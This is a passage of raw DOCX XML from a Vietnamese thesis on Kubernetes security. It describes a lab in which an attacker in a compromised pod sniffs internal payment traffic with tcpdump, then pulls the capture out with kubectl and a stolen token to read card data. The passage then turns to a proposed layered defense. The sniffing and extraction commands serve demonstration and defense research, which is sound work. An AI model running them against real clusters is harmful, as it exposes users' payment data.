      <w:r>
        <w:t xml:space="preserve">Hệ thống bổ sung một microservice ngầm mang tên </w:t>
      </w:r>
      <w:r w:rsidRPr="0043452B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>payment-service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Khi người dùng thực hiện thao tác tại form thanh toán trên giao diện Frontend, Frontend sẽ tạo một yêu cầu HTTP POST truyền chuỗi dữ liệu thẻ thô qua mạng nội bộ tới địa chỉ </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="0043452B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://payment-service:8080/charge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7BDF6" w14:textId="6344F2C9" w:rsidR="00DD1DE0" w:rsidRPr="00D64E0A" w:rsidRDefault="00DD1DE0" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc235976391"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="57FF7137" w14:textId="77777777" w:rsidR="00DD1DE0" w:rsidRPr="00DD1DE0" w:rsidRDefault="00DD1DE0" w:rsidP="00DD1DE0">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cài đặt công cụ bắt gói tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1DE0">
        <w:t>: Tại phiên shell tương tác của Pod Frontend (nc), kẻ tấn công thực hiện cập nhật và cài đặt công cụ phân tích mạng:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD1DE0" w14:paraId="4AD305F5" w14:textId="77777777" w:rsidTr="00DD1DE0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4CBEB282" w14:textId="70C92434" w:rsidR="00DD1DE0" w:rsidRPr="00DD1DE0" w:rsidRDefault="00DD1DE0" w:rsidP="00DD1DE0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1DE0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>apt-get update &amp;&amp; apt-get install -y tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DCFEB8E" w14:textId="65C63475" w:rsidR="00DD1DE0" w:rsidRPr="00010541" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kích hoạt cắm chốt bắt dữ liệu:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:t xml:space="preserve"> Kẻ tấn công ra lệnh cho tcpdump ghi lại toàn bộ lưu lượng di chuyển qua card mạng eth0 của Pod và xuất ra file định dạng pcap:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC7C59" w14:paraId="7F0B1B77" w14:textId="77777777" w:rsidTr="00EC7C59">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="67032764" w14:textId="7670A821" w:rsidR="00EC7C59" w:rsidRPr="00EC7C59" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>tcpdump -i eth0 -w /tmp/network_traffic.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F95D245" w14:textId="766D2797" w:rsidR="00EC7C59" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giả lập giao dịch người dùng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Từ máy Kali, mở trình duyệt truy cập giao diện ứng dụng mục tiêu, điền thông tin thẻ tín dụng (ví dụ: 4111-2222-3333-4444, CVV 123) vào form </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Cổng Thanh toán Đơn hàng nội bộ"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rồi bấm </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác nhận Thanh toán (Checkout)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB4224" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="003232A1" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003232A1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A47352" wp14:editId="48D2F7F2">
            <wp:extent cx="4521200" cy="2065659"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11529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5991" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4526615" cy="2068133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FC391" w14:textId="1F212BB3" w:rsidR="003232A1" w:rsidRPr="009823E1" w:rsidRDefault="008A233C" w:rsidP="00B427E4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc236001540"/>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12</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Thao tác thực hiện thanh toán</w:t>
      </w:r>
      <w:r w:rsidR="00B427E4" w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> của người dùng bình thường</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="11B08014" w14:textId="4D0BC71F" w:rsidR="00EC7C59" w:rsidRPr="009823E1" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trích xuất file PCAP về máy tấn công:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> Quay lại shell nc, bấm Ctrl+C để dừng tcpdump. Tại máy Kali Linux, dùng quyền Admin (có được từ bài TN-02) để kéo file pcap ra ngoài máy vật lý:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC7C59" w14:paraId="0D8DD099" w14:textId="77777777" w:rsidTr="00EC7C59">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="51DC5AA2" w14:textId="28BD656E" w:rsidR="00EC7C59" w:rsidRPr="00EC7C59" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kubectl --server=$MASTER_URL --token=$TOKEN --insecure-skip-tls-verify cp default/&lt;POD_FRONTEND&gt;:/tmp/network_traffic.pcap ./network_traffic.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="043FAD2E" w14:textId="77777777" w:rsidR="00B427E4" w:rsidRDefault="003F402A" w:rsidP="00B427E4">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="-567"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F402A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0EFF4F" wp14:editId="614685ED">
            <wp:extent cx="5581650" cy="1179830"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="131660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01153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5581650" cy="1179830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76612A10" w14:textId="3A570CB6" w:rsidR="003F402A" w:rsidRPr="00B427E4" w:rsidRDefault="00B427E4" w:rsidP="00B427E4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc236001541"/>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13</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B427E4">
        <w:t>. Traffic từ pod p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ayment được hacker dump được truyền ra ngoài</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="724FA43E" w14:textId="04E8E9E2" w:rsidR="00EC7C59" w:rsidRPr="00B427E4" w:rsidRDefault="00EC7C59" w:rsidP="00EC7C59">
      <w:r w:rsidRPr="00B427E4">
        <w:t>Phân tích bằng Wireshark: Mở file bằng công cụ Wireshark trên Kali (wireshark network_traffic.pcap), lọc giao thức http, bấm chuột phải vào gói tin /charge chọn Follow -&gt; HTTP Stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9AA13A" w14:textId="77777777" w:rsidR="00B427E4" w:rsidRDefault="003F402A" w:rsidP="00B427E4">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="003F402A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61EC8051" wp14:editId="10D4AAD7">
            <wp:extent cx="5170210" cy="3016250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57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63" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5170927" cy="3016668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56984533" w14:textId="7F38A55D" w:rsidR="003F402A" w:rsidRPr="00B427E4" w:rsidRDefault="00B427E4" w:rsidP="00B427E4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc236001542"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B427E4">
        <w:t>. Kết qu</w:t>
      </w:r>
      <w:r w:rsidR="007C7221" w:rsidRPr="00C77A90">
        <w:t>ả</w:t>
      </w:r>
      <w:r w:rsidRPr="00B427E4">
        <w:t xml:space="preserve"> quá trình khai thác là thông tin thẻ tín dụng của người dùng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="5FDCF7C8" w14:textId="559B1134" w:rsidR="00EC7C59" w:rsidRPr="00D64E0A" w:rsidRDefault="00EC7C59" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc235976392"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="2E908BDA" w14:textId="6A799858" w:rsidR="00EC7C59" w:rsidRPr="009823E1" w:rsidRDefault="00EC7C59" w:rsidP="00727AA1">
      <w:r w:rsidRPr="009823E1">
        <w:t>Toàn bộ thông tin nhạy cảm của người dùng bao gồm số thẻ tín dụng, mã bảo mật CVV và số tiền giao dịch hiển thị rõ mồn một dưới dạng văn bản thuần (Plaintext). Thực nghiệm chứng minh sự nguy hiểm của cấu hình mạng mặc định trong Kubernetes: chỉ cần một Pod hướng ngoài bị hack, toàn bộ dữ liệu truyền thông nội bộ của các Pod lân cận đều có nguy cơ bị nghe lén nếu thiếu cơ chế mã hóa TLS và Network Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED6DC4" w14:textId="306B03BB" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc235976371"/>
      <w:bookmarkStart w:id="102" w:name="_Hlk236003040"/>
      <w:bookmarkStart w:id="103" w:name="_Toc235976393"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t xml:space="preserve">Thử nghiệm đánh giá </w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t>mô hình giải pháp đề xuất</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:p w14:paraId="3998B3B2" w14:textId="3FF00D14" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="006F4E96">
        <w:t>Để hiện thực hóa</w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve"> khả năng phòng vệ cho hệ thống container trước các mối đe dọa và phương thức tấn công được thực hiện ở trên</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4E96">
        <w:t xml:space="preserve"> và gắn kết các công nghệ đơn lẻ (Trivy, Seccomp, PSA, Falco, Calico) thành một hệ sinh thái an ninh đồng nhất, </w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t>học viên</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4E96">
        <w:t xml:space="preserve"> đề xuất mô hình triển khai kiến trúc phòng thủ đa lớp (Defense-in-Depth) xuyên suốt vòng đời của Container. Kiến trúc này được thiết kế theo tư tưởng "Shift-Left Security" (Đưa bảo mật lên sớm) kết hợp với "Zero-Trust" (Không tin cậy bất kỳ ai) tại tầng vận hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3232960C" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009D67A9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc235976372"/>
      <w:r w:rsidRPr="009D67A9">
        <w:lastRenderedPageBreak/>
        <w:t>Sơ đồ kiến trúc logic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="092EC987" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F44394D" wp14:editId="4756FD03">
            <wp:extent cx="5581650" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="103787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81650" cy="3139440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B310CA" w14:textId="067A3F86" w:rsidR="00175415" w:rsidRPr="009D67A9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc236001543"/>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15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkStart w:id="106" w:name="_Hlk236002844"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mô hình giải pháp bảo vệ hệ thống container đề xuất</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="45980BB2" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc235976373"/>
      <w:bookmarkStart w:id="108" w:name="_Hlk236003281"/>
      <w:r>
        <w:t>Luồng thực thi của giải pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:p w14:paraId="75057E3B" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00175415">
        <w:t>Mô hình triển khai trên được vận hành theo một luồng xử lý khép kín, triệt tiêu mọi khả năng can thiệp trái phép tại cả 3 giai đoạn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8A414" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175415">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Giai đoạn Tích hợp liên tục (CI/CD - Build):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B7CD7" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve">    Lập trình viên đẩy mã nguồn và Dockerfile (đã chuẩn hóa Distroless, chạy dưới User thường) lên kho chứa (Git).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45011B66" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve">    Đường ống CI/CD tự động kích hoạt engine rà quét Trivy trước khi đóng gói. Nếu phát hiện các thành phần thư viện chứa CVE mức độ Cao/Nghiêm trọng hoặc rò rỉ secret, đường ống sẽ tự động hủy bỏ tiến trình (Fail-fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684E2FB" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00573972">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F354536" wp14:editId="69AD22C0">
            <wp:extent cx="4791399" cy="2595204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14736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2913" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4801240" cy="2600534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304A999" w14:textId="5CEDFD00" w:rsidR="00175415" w:rsidRPr="00FB4AA9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc236001544"/>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16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FB4AA9">
        <w:t>. Quá trình thực hiện scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> image với Trivy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="24EB3A6F" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009D67A9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Giai đoạn Phân phối (Registry - Ship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D84B8" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009D67A9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image được đẩy lên hệ thống kho lưu trữ bảo mật (như Harbor). Kho lưu trữ này đóng vai trò như vùng đệm sạch, từ chối tiếp nhận các Image không có chứng chỉ ký số hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049833A" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009D67A9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Giai đoạn Vận hành (Kubernetes Cluster - Run):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C0FA0" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
